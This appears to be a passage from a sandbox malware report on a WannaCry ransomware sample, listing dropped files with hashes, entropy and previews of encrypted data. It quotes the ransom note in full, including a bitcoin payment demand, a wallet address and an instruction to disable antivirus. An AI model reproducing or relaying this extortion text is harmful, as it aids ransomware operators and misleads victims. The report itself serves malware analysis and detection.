                                SSDEEP:24:bkU8XSKuOkD0aIAMSPdecLKlxeVMW7xOwjZAOjG5QcxiCwZoFC:bkxCKM0ahvwRLWswdAOjG5Qz
                                MD5:4751E0190F835BFFA8946BAF61FCE8FE
                                SHA1:6C275C9A0A13273542D2780CC312FF2AE92C3B73
                                SHA-256:F6E752EDBA3EA3742D9166BA481767F27CAFE2D62130707FAE0FE7B9EF2621BE
                                SHA-512:C2D400CECB8DEE98FB6821F68DC1D2A7E4F2E760D146F04DDC87E36C178BF9BBFC303B5E0BCEDB64171699F142F6D90682BCC5D6917CCDBD92DD7F2E81D44186
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807707754121254
                                Encrypted:false
                                SSDEEP:24:bWpZTXI3gX2S0HX6GRc7Q2inoectN5VLxnMlFu4:SpZTIgXB0HXHRQQ28pSLxMvu4
                                MD5:A3D5C949D65B462B8876FFE5B4A7D6F3
                                SHA1:AE3E5AC0C39269E4589A02C96519C088CC1EAD25
                                SHA-256:0820C12E14C803792CC8BE1C62190ED3D98E27CDFA14054C193F45A118D62721
                                SHA-512:2FACE32C17BE4AE667B7816F9F865433C658329BFD45AE822A318C48D8B1CBE2D0CF4C245783F34D3FB8D12B77DFA1498DFF08D828D1D15A548317D74DD162AB
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8394091260184995
                                Encrypted:false
                                SSDEEP:24:bkwMibKHNeV9ZdykGEkdUfxgc6y15+JmzEfAeLfgMP7pRgEJhxyHCznhthgjxe:bkwMh+ZdykGP1Ty19z+XfrvgEJXishqe
                                MD5:CF7AEFD2C19DE645A1613167F5F3521F
                                SHA1:2A0E079732C57A3D6B64D655B30B8B5924DFEAC8
                                SHA-256:E094071E48BCC25382C2658C78F912C8B05F8F723CAC119D0A47E41A2C5465F2
                                SHA-512:7D25F58B7A36C134C54E4276DF2711785D81615E304D4F9691471271290D46E440CA7A27F4234FF7501350B49BCFDC96A8F16FC16566557C136879ACB06D113C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796805658692537
                                Encrypted:false
                                SSDEEP:24:RObUjgDAZr44p48g4DTrhsYRQ4QZEXQrBzsItyBY8V3zF4DoldPoPijf:ROb6T48gm523WXCzJtyjdvlmPi7
                                MD5:4947EDCF59AA746A1CD542BD88B3A7E0
                                SHA1:1E6AC68900C039D09271D1CBD656F0A5C8A2A394
                                SHA-256:5128C163E2072D84C1382236D9A859B2D1A920B01F1BFB1FF842DB81FDF324CD
                                SHA-512:C265B0851E6AFF4CFBB311FED68D25DA3AC59559D3DE3EA9A5B39DA5312F9829577469F01FC7349A5E451A7390767A7FE26BB398600EDC6E603038DD8C53B13F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844898851480916
                                Encrypted:false
                                SSDEEP:24:bk7STcijTyPlpR2T8BJlxw830bGf5eJcYiEnTCq8CXJ8rMSZHopKuB46UC+oiP0:bk7fizy/w83LRC+oXhUgp+ol
                                MD5:393522B2335A208E7D699CE7638E4FC0
                                SHA1:167B9ACA3653B5146388477CF8262E386E12EB7B
                                SHA-256:84352DF9CF6839E4CF52188AB26B9BB819E307423BD2E0344F511E3982541BAA
                                SHA-512:0DF187E6727BE2331776EA102F743CB8A530FB2562E3D785FF8CA9CFAF315E8075B2E2167B2E0316F64620D636D6D971B9D4C065BF3616A3CFBA1669B12E3012
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816975207396427
                                Encrypted:false
                                SSDEEP:24:QCJ/LKhCR+TfyDi5hWUYIJ1H/4gqVhRsl+Q8ZV3xXta:DxL+TkKZfgg0gjcta
                                MD5:F7ECD6F0A4F0DC4F6709DB062FF1C1CB
                                SHA1:3922C1DD149179529F42F1EF503F18AECF41406E
                                SHA-256:604F77011900E78218152CF67D86960C20A2F6C8B733CE591FC526A4908ECB86
                                SHA-512:6B7716EED40C70A414AD78EC7900C53B3571706961C1CED115A659475199993AAC0D87213036679C2116F3186FB53D88F0C060D1BF52B4A5D681CBA5BCA158F0
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.842194311026458
                                Encrypted:false
                                SSDEEP:24:bkSc9b15VsGdFff5R4jlA8Ko0HB1vo/GaHuLOO4uhGeIqlIjHtE0:bkdb15Vdd54jlA8Ko0P3nlHbI3NJ
                                MD5:913D38C89EDF4F7DC0C05CEFD1A1FC46
                                SHA1:5DA71EDCD8B3BC8F01F76964B38B87A0EDBFCC0C
                                SHA-256:2BD9981848B21418451EC88086D71BF43F6C5EC93A13E435C92769C97BB44DCD
                                SHA-512:4FD038B950C17591E2923726817E358FABBF77E4CCF5F6BEA7958AB647D537A4DD04D1A041F07B12F26F5259C6783E76E0919CBFFB58DD74ED48327DD50E6E8B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821689998719985
                                Encrypted:false
                                SSDEEP:24:NGsYqrUYhPZ9XjlGpCTJAa37z3wBZSFfHdmWPI2OWaB9m:wsYqoSDGpCN3z3wBo9Q2haB9m
                                MD5:0F5320372A87D61D3B47215C2FBC3815
                                SHA1:1E53262F7BE9C62A3EB9573FD147599EC322DAC7
                                SHA-256:9E0BCADC941715BEA1FD36D492EADC172C48159751DAC28E388B6890399FF340
                                SHA-512:146C2F6118FDE29433D1C25A5000E410C35D1B3535BFCE45C70A3D62AB937C7C5F84C12C4CA85768AD45AC9EFC8C38D9E46D276B2071E1181492FC737217D352
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847547959070516
                                Encrypted:false
                                SSDEEP:24:bkC/azcH2dCRxt92PyRhT3HmxDIP82+6WA90KwRKAGvL+Punf06Ehd:bkCacH2dyxt92PyRhG+8X690XRCT+WD+
                                MD5:38207A629C2748ED126F4305CA232931
                                SHA1:2C064E43C8329061811110CEE0E058A503DF7FF9
                                SHA-256:2F3794AD3C0A41BF93389EA5AF42CD48F93A7B296713F201B0CE1A841576E6F7
                                SHA-512:733E3855B75AE464720FA4398D85D2F88BB899AEF25236E116709E27C9C48A248C1EF186AEF750F25590F5C3DE9603AF921D3B319AFCD46C734F0D0AA26A7CB5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.825383008262881
                                Encrypted:false
                                SSDEEP:24:2liK6PuY0lxHhfZRupn9fo70dR6mGq3Y3i1H8wfjf6:SijuYSxHJZRkVzYSRy
                                MD5:9E1835870223FC3D21AF2984503769FE
                                SHA1:7D20C2CC66CCF615E9DFAF94673B4CDD0AF8E76D
                                SHA-256:9775D3F42FD590FC6E6C02AD2F4AD0B113BBEED0025D7EE6D2A6CD41C98A7427
                                SHA-512:645A487F54FFA084A38815406E31CF0245BF2238DC16D186FADD1824BAEE31EB4CE1541603CF9400821E77E1D200D6E9CFB3F49EEEEDAA4709C178D0B2B331F2
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843636029897996
                                Encrypted:false
                                SSDEEP:24:bkkv64X+l65cKaas7QJDtqQr/v+HQSjMlBl9o/gt/65L+srNVh23Fn:bkkvpuXK47QJx3r/FkM3XBM6srDQ3Fn
                                MD5:285AB0B9879CF2CD3D6B36B119D62B2A
                                SHA1:E878DE0036F907D7E7DD8D942D1FF73D317D110A
                                SHA-256:7EC515EF5DB0932FCE47DFAE0B4457ACEF3328223C8C700BB5DC9338CCC6FCA8
                                SHA-512:4A42C9CED3010ABF343A955FF1217E8E4794CAEF0DEB96831E43DBA6609006922AFB34D6D3419ADE445CFAEEDE7AB352FE0F594AA5848EC60D2691B0F31FB0B5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843636029897996
                                Encrypted:false
                                SSDEEP:24:bkkv64X+l65cKaas7QJDtqQr/v+HQSjMlBl9o/gt/65L+srNVh23Fn:bkkvpuXK47QJx3r/FkM3XBM6srDQ3Fn
                                MD5:285AB0B9879CF2CD3D6B36B119D62B2A
                                SHA1:E878DE0036F907D7E7DD8D942D1FF73D317D110A
                                SHA-256:7EC515EF5DB0932FCE47DFAE0B4457ACEF3328223C8C700BB5DC9338CCC6FCA8
                                SHA-512:4A42C9CED3010ABF343A955FF1217E8E4794CAEF0DEB96831E43DBA6609006922AFB34D6D3419ADE445CFAEEDE7AB352FE0F594AA5848EC60D2691B0F31FB0B5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807597186214773
                                Encrypted:false
                                SSDEEP:24:4lwDhfyX1YujPBr/+BDsBVt2W6kkDsTK9YvdSXchwE9uch7K4MG6/l1awPz2:sO21YSP4at2W6kpKW4XcDuaxMGAfaw6
                                MD5:EC7D55E70F064DCE637E8621F5127B8C
                                SHA1:5B06575BFC5D2DE24BD4F78502E1DAAFBC5C82CB
                                SHA-256:56EE07AE62A5FE0930B24EB7FC003128582D9A059675119A19A28C17FD187D50
                                SHA-512:DC6D7B6D977939EE472DFD14FF5974FE7F788AB0FF34FB100AFC791CC70E7238252680EA82AE6FDBCD6957A21D079670A8DEF64E3CA2B4D0576397B179796FF7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843921930752668
                                Encrypted:false
                                SSDEEP:24:bkTSsNxrn+fMNvDxS1P9MKbF96xXGcUsPK30bgE9xOF74fQXn5O/:bkThxrnEerK/6xwL0UmC4wo
                                MD5:0C196C8A72098BA49555254F0B1C9699
                                SHA1:FF7864858F52E49AE41819F279CC02CDFAF283E2
                                SHA-256:DBADC92561A4A741C45E91E4F7F2E8E0B14380DE03F7CA89AAEA2E375EC22760
                                SHA-512:925FA1AD847C185127132F9ABB5A3D75D530B27554920D2FCB4570D83879BCCF0051EF76EC7BCC45976228ADD4956A4A1479A579E43BC75B69185EDC50B84DD7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843921930752668
                                Encrypted:false
                                SSDEEP:24:bkTSsNxrn+fMNvDxS1P9MKbF96xXGcUsPK30bgE9xOF74fQXn5O/:bkThxrnEerK/6xwL0UmC4wo
                                MD5:0C196C8A72098BA49555254F0B1C9699
                                SHA1:FF7864858F52E49AE41819F279CC02CDFAF283E2
                                SHA-256:DBADC92561A4A741C45E91E4F7F2E8E0B14380DE03F7CA89AAEA2E375EC22760
                                SHA-512:925FA1AD847C185127132F9ABB5A3D75D530B27554920D2FCB4570D83879BCCF0051EF76EC7BCC45976228ADD4956A4A1479A579E43BC75B69185EDC50B84DD7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8291609997912746
                                Encrypted:false
                                SSDEEP:24:an8Mc430gzbB1dFOd9wzpuqXF5v4CD9jPWhLuYotN:rMcM0obB3w9wzbv4ChLWhLuYe
                                MD5:1CEB65BE7B53214D0287AEB8B6F02FBB
                                SHA1:34099CFC592C9096A00BB77EFA10C3081DF3D398
                                SHA-256:47C9C7F6CDF1754F0A18B9F28C5B66E2C690CEF8727D5DF279040BF3A597904A
                                SHA-512:20A5A0B7646A4568D8FFDD9E5B864D5F2EF600BE84E4C5851BAC9D263950E37E03846022F304EBD25D3C2FD3631481421C4179F253C00C59C3FEA6F88D70AB6D
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.820626981448829
                                Encrypted:false
                                SSDEEP:24:bk+Ay8TW0+6zrG/TyfoDZ0tKkS6zY3ZsKRfSZx/ZWxvq88q3rQnqhSzJBfHHP:bkfPd+6/GsMIKkx8psSfS1WxB8urcBfP
                                MD5:BFB9A34DC13932FCF7439A4722F9A7B6
                                SHA1:32478236D331CB78D621ED71A675938E320913CE
                                SHA-256:003483509F2C17417115B3325DDD365E9C5203DEF8748F7EC2EFA80CC480657C
                                SHA-512:AAD93E1EC8256295BF7E45F6E446747E649E2F4C43122E6F40A8BED10CAA5B8F0967BE277F2885BB2A747B167FBAFC2936B10E2D1E85E6A2CA4DD1E0B0C2263F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.820626981448829
                                Encrypted:false
                                SSDEEP:24:bk+Ay8TW0+6zrG/TyfoDZ0tKkS6zY3ZsKRfSZx/ZWxvq88q3rQnqhSzJBfHHP:bkfPd+6/GsMIKkx8psSfS1WxB8urcBfP
                                MD5:BFB9A34DC13932FCF7439A4722F9A7B6
                                SHA1:32478236D331CB78D621ED71A675938E320913CE
                                SHA-256:003483509F2C17417115B3325DDD365E9C5203DEF8748F7EC2EFA80CC480657C
                                SHA-512:AAD93E1EC8256295BF7E45F6E446747E649E2F4C43122E6F40A8BED10CAA5B8F0967BE277F2885BB2A747B167FBAFC2936B10E2D1E85E6A2CA4DD1E0B0C2263F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.812031174501806
                                Encrypted:false
                                SSDEEP:24:lyOB9TgMl5rT1qmfOfY8A1wn2YCmJCtrL/6cVgy:YyT7rTtrfrpgy
                                MD5:DFDC4CF8484A70958078D41B9B93BDA4
                                SHA1:9AF22447A6E17AF7EB797C047B7E7C23FA10E739
                                SHA-256:B62D590AA815E82D9827826CC79C29031082C7E3F750D31FED961D30F8D04B45
                                SHA-512:4780925D02F8D2338EDA9F9BF3FAB655C18D184F43649572F78F29D4604081E3B9560AA97DA6929ABCFD4537760C0F25CD1F159AA10F138E46623388AB4E6311
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.823705150100479
                                Encrypted:false
                                SSDEEP:24:bkDv7OgyefoKitdnGK9mKPnd4StMmwVcgk23e8WndyywM0iQ5iGieizn:bk77OBKAGK9dl3Yqv23e8Ugu0iQ5iGid
                                MD5:C28954C207A0DD2576A857FC5A4B0933
                                SHA1:96F0FE7E36C159F2C1A043881C3A926E6919371F
                                SHA-256:6817DA60B5DC619BA500D6C75DCB4171AC15497DF86947CFF2DFD97722C8A9EB
                                SHA-512:5B037B093E8E0FF56D5643DA874CC7DF44C1C90A940E2AB1F3E136F38A81BB1A4BBFB1407ECCD72A8C2ED03B20CF10093A3C69844E84613CB4FE0E26180E74B4
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.823705150100479
                                Encrypted:false
                                SSDEEP:24:bkDv7OgyefoKitdnGK9mKPnd4StMmwVcgk23e8WndyywM0iQ5iGieizn:bk77OBKAGK9dl3Yqv23e8Ugu0iQ5iGid
                                MD5:C28954C207A0DD2576A857FC5A4B0933
                                SHA1:96F0FE7E36C159F2C1A043881C3A926E6919371F
                                SHA-256:6817DA60B5DC619BA500D6C75DCB4171AC15497DF86947CFF2DFD97722C8A9EB
                                SHA-512:5B037B093E8E0FF56D5643DA874CC7DF44C1C90A940E2AB1F3E136F38A81BB1A4BBFB1407ECCD72A8C2ED03B20CF10093A3C69844E84613CB4FE0E26180E74B4
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.825947631419461
                                Encrypted:false
                                SSDEEP:24:x7fp0oPdc2SyCci1kZGnZXlKZ8Q9YQtbceGXO:pyH2l54nFwp9Dae
                                MD5:F12D1648D4DD7E55B38838B51FF65918
                                SHA1:35C143B201608C7CF6A0ADF55971C0AACFE1B1B2
                                SHA-256:44A8AFFD77EAC7203F9CDB7314BC306A517D006B46ACAA35C69D682010490A0D
                                SHA-512:45122A4550CD9B040E3F4052BA9E4E472585BB9EF082D7CD968D6F0B8BD153B78E60D4B52D3851C9460CF4EB7429A0D3DC8213BAE6C8D4088E3D5D27FA8D51D2
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832260462943057
                                Encrypted:false
                                SSDEEP:24:bkeXWzcWbEsd/we+8Yg6mS3lE9+uPLL5qLgzAuVdh1KcmBgoj63vaDr:bkvc/sRwe+BgCE9+u5qeAM1gDj6Mr
                                MD5:5851A2BABAC8726697D1BBEA73841D4E
                                SHA1:53C26995290A4BE023C34018C4CBDFD6083F0BE2
                                SHA-256:EDC0C1527E600355EFE64972112C6B847DB5E3F22CFE8ACCCDD23DD9A626E951
                                SHA-512:819F71457D232508CE4C270EA0D4882BCB16D285599F273152C3004B91643E1B52AF841FA2EFE6A1A9F3CFBF86C1036AFCC9EA2EF56F5FEABE4C5FDA411713F5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832260462943057
                                Encrypted:false
                                SSDEEP:24:bkeXWzcWbEsd/we+8Yg6mS3lE9+uPLL5qLgzAuVdh1KcmBgoj63vaDr:bkvc/sRwe+BgCE9+u5qeAM1gDj6Mr
                                MD5:5851A2BABAC8726697D1BBEA73841D4E
                                SHA1:53C26995290A4BE023C34018C4CBDFD6083F0BE2
                                SHA-256:EDC0C1527E600355EFE64972112C6B847DB5E3F22CFE8ACCCDD23DD9A626E951
                                SHA-512:819F71457D232508CE4C270EA0D4882BCB16D285599F273152C3004B91643E1B52AF841FA2EFE6A1A9F3CFBF86C1036AFCC9EA2EF56F5FEABE4C5FDA411713F5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.803036648864622
                                Encrypted:false
                                SSDEEP:24:63gosUjTZ7Yqjg+DDRmEPrX8dS/GkcP4ORN9OYMUjE:aTR9VPRmEOBP44N9jMUjE
                                MD5:D380E9430EC3C916615F414F70A99D18
                                SHA1:6489F23BD40C44AE0337423A2DC43CBA6EC84EBB
                                SHA-256:A25196FEED0198DF77D61635729AF0995912FADC6C906E7859888952B781180F
                                SHA-512:BF15FD186486211CC98EF2CEF40B6E66BA6723C8660EC2B5BB42BBFBDFCF55458B4C91DC845D8C5F1C7B4734272601D6C2381C0E8382BBB52731A19F3B984E9E
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854414447472964
                                Encrypted:false
                                SSDEEP:24:bk0zZB5VvEjKZcipaOMw1gpnIE3VLk60/+CZr6IS0v7N78xN7sVAG4ypOEf1:bkoj5VvyMgWbVjl79jmxJsVJpxf1
                                MD5:9B0F5AAB8DE2FA5874BF2C3D97ACDE6D
                                SHA1:8706BE37720C2EFA053BB7E4F08714FF14052C38
                                SHA-256:EB42F16D0565971DB5373A0F250F3121019CBC3FF453A2BEF3C2AA835D34E53E
                                SHA-512:6973A1CA6841D84D6BC2BDBC6BB6503C1F210E77DF786BB8A637CD91BE1117E26F8D3B33816F4064EA2945A06007B2A47AAB64B2F62EAA852D1CF4797A614E59
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....$..s.n[.j.Y8.f.qndT.......?.v..9Y./b.h..S^.v{.C..-.@..F..9..;..........E?n..4.....)..N_..0.....vI.(P...od....H..-.....W.X./..........\3..mU..[....Mm....h.J....A)....-..U.*...o..7.]rk. ..4.I70\.I..c...s*.p...Iv!..E......F.j...1...._..3..T.............n..|_...!..K^gq.0...Gy4N.\.6a.....F..%w....2...3.C.A.G.x_.<.....o.$%,.P@.,4...@9.-3(^.....b...YTq".#S....Y..`..!1../.1...N..".......1XUJ..+E.....l....,...4. q=Q.i$q..v...8.Y+t...U..;+....t.D..%)>..ld..E\.K.IQ.......X..J.$+;5.Du.t.......>l!...h.;......[...$..^P....-d...0~}wKk....n.....#.3eV..!.K..L..V...+.... .sa!<.V....,..8..9a.Z4._n..B...V....rA.f...A&1A._H}...$!....}Q.`.6.[].....\..1G..p... .....1.dS.).}|bq.[....<^o.m......>..@pt)u@.U.6....X..p>..uUl..6...#...]...<.>.:s..J.....=sjI.)........\F]..Q....._;..ss..ZgP..N...D.|....x......%h.....O.O.2...z.u.....{.~..38C.5...6<_...&.1OJ.'...`ZK..SA:H..~.z.~...=w.v.d..s...;.M.....@...r.x....q.G.qp.W..........A..U..".......z...g...
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854414447472964
                                Encrypted:false
                                SSDEEP:24:bk0zZB5VvEjKZcipaOMw1gpnIE3VLk60/+CZr6IS0v7N78xN7sVAG4ypOEf1:bkoj5VvyMgWbVjl79jmxJsVJpxf1
                                MD5:9B0F5AAB8DE2FA5874BF2C3D97ACDE6D
                                SHA1:8706BE37720C2EFA053BB7E4F08714FF14052C38
                                SHA-256:EB42F16D0565971DB5373A0F250F3121019CBC3FF453A2BEF3C2AA835D34E53E
                                SHA-512:6973A1CA6841D84D6BC2BDBC6BB6503C1F210E77DF786BB8A637CD91BE1117E26F8D3B33816F4064EA2945A06007B2A47AAB64B2F62EAA852D1CF4797A614E59
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....$..s.n[.j.Y8.f.qndT.......?.v..9Y./b.h..S^.v{.C..-.@..F..9..;..........E?n..4.....)..N_..0.....vI.(P...od....H..-.....W.X./..........\3..mU..[....Mm....h.J....A)....-..U.*...o..7.]rk. ..4.I70\.I..c...s*.p...Iv!..E......F.j...1...._..3..T.............n..|_...!..K^gq.0...Gy4N.\.6a.....F..%w....2...3.C.A.G.x_.<.....o.$%,.P@.,4...@9.-3(^.....b...YTq".#S....Y..`..!1../.1...N..".......1XUJ..+E.....l....,...4. q=Q.i$q..v...8.Y+t...U..;+....t.D..%)>..ld..E\.K.IQ.......X..J.$+;5.Du.t.......>l!...h.;......[...$..^P....-d...0~}wKk....n.....#.3eV..!.K..L..V...+.... .sa!<.V....,..8..9a.Z4._n..B...V....rA.f...A&1A._H}...$!....}Q.`.6.[].....\..1G..p... .....1.dS.).}|bq.[....<^o.m......>..@pt)u@.U.6....X..p>..uUl..6...#...]...<.>.:s..J.....=sjI.)........\F]..Q....._;..ss..ZgP..N...D.|....x......%h.....O.O.2...z.u.....{.~..38C.5...6<_...&.1OJ.'...`ZK..SA:H..~.z.~...=w.v.d..s...;.M.....@...r.x....q.G.qp.W..........A..U..".......z...g...
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823508414706776
                                Encrypted:false
                                SSDEEP:24:cSEeJLSdKuxe/9qQvFGOOu815e1nkQC3fd9ZR/H8zi75:cmLrD/gQvFGbL1wtkQsjZq05
                                MD5:E531D7DBB5C2D74868AE5FE3EBD3C215
                                SHA1:79FBB4A5CB79BB2AB8C70C8E5E6E034341BB30AB
                                SHA-256:9A296B59302919774850BCE22244D71429CF412418C126AC6EC6DA1C6AA7F1DB
                                SHA-512:0A6B8D339619BE8130D2B35F42990376214A7B9F71B3B613482197589F37D3012003B93986563CC1DC49A7FF1A8DA10BD4C424E25896F95190E31AEA69F96F0B
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8422718049087745
                                Encrypted:false
                                SSDEEP:24:bkq3nby5zbBC2itcclHD85GaV1dH0q06U85+Qo1/1Ck3MCt+PQkIxTv8SqROFUJ:bkabytw228GabdH0q5+QMjoKxTv8REFG
                                MD5:F0682F3B25DD0D8BC9D6E136E061A1DD
                                SHA1:FDB9DA6A01C6405036694AE9B2FBF8ACBF3AFD67
                                SHA-256:F0C299A4C04A469EF66B390240428C7DC7F25606FCA13836BB7259E5E88D3F23
                                SHA-512:1F77662A260F4FDC4550A3C9E2A35F763BEDE1D161C488CC5DE997969CBE912355B9B3F4FBC472EA65E85973A50F67CA37F22391646D90CBC99D84C30CB478E5
                                Malicious:false
                                Reputation:unknown
